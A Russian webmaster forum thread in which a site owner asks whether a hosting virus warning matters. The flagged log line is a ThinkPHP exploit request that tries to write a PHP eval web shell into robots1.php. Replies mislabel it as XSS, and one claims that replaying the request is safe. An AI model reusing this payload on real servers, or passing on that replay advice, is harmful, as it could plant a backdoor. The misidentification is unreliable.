Вирус ли это?

12
nastroen
На сайте с 23.08.2013
Offline
77
2164

В панели хостинга вижу предупреждение о вирусе на сайте.

Выглядит оно так:

site.ru/public_html/wp-content/bps-backup/logs/http_error_log.txt

http://site.ru//?s=index/\\think\\template\\driver\\file/write&cacheFile=robots1.php&content=xbshell @!!!><?php eval($_POST[admin]);?>REQUEST_URI: //?s=index/\\think\\template\\driver\\file/write&cacheFile=robots1.php&content

Действительно ли это вирус, который необходимо лечить?

Mik Foxi
На сайте с 02.03.2011
Offline
1076
#1

Это XSS в логи записалось, вам надо проверить реальная ли это дырка или только попытка поиска уязвимостей.

Антибот, антиспам, веб файрвол, защита от накрутки поведенческих: https://antibot.cloud/ + партнерка, до 40$ с продажи.
nastroen
На сайте с 23.08.2013
Offline
77
#2

Я не знаю, к сожалению, как проверить, дырка ли это.

Но этот файл http_error_log.txt лежит у меня в папке logs, созданной плагином защиты Wordpress BulletProof Security: site.ru/public_html/wp-content/bps-backup/logs/http_error_log.txt

S
На сайте с 30.09.2016
Offline
469
#3
nastroen:
Я не знаю, к сожалению, как проверить, дырка ли это.

Воспроизведите запрос, он сам по себе безопасный. Посмотрите, существует ли файл robots1.php. Как-то так, в общих чертах.

Отпилю лишнее, прикручу нужное, выправлю кривое. Вытравлю вредителей.
F
На сайте с 17.03.2018
Offline
21
#4

вроде как shell под тему WP или плагин

поди тема для WP ломанная ??

Nefeliks Nefeliks
На сайте с 15.11.2008
Offline
368
#5

Напишите ак разобрались с проблемой. Такое наблюдал в одном из рабочих компов.

Заработок по CPL на бурж студентах! ( https://clck.ru/FLgij )
nastroen
На сайте с 23.08.2013
Offline
77
#6
Nefeliks:
Напишите ак разобрались с проблемой. Такое наблюдал в одном из рабочих компов.

Еще до создания темы нажал кнопку "Лечить", которая была под тем сообщением в контрольной панели хостинга.

Тогда файл http_error_log.txt очистился.

Если появится еще подобное сообщение о вирусе, буду, как советовали выше, воспроизводить запрос. Файла robots1.php не существует. Ломаная ли тема, не знаю, брал ее с нормального сайта в 2010-м.

I6
На сайте с 17.05.2007
Offline
130
#7

Подскажите, пжста, что эта за хрень в конце?

<!--//GoogleAnalytics-->

</body>

</html><!--2c14a49abdbf31a58bd**********d6f-->

S
На сайте с 30.09.2016
Offline
469
#8
ital62:
Подскажите, пжста, что эта за хрень в конце?

<!--//GoogleAnalytics-->
</body>
</html><!--2c14a49abdbf31a58bd**********d6f-->

Это md5-хеш.

I6
На сайте с 17.05.2007
Offline
130
#9
Sitealert:
Это md5-хеш.

Спасибо! А он там нужен?

S
На сайте с 30.09.2016
Offline
469
#10

Наверное, кто-то для чего-то это туда вставил. Вам виднее.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий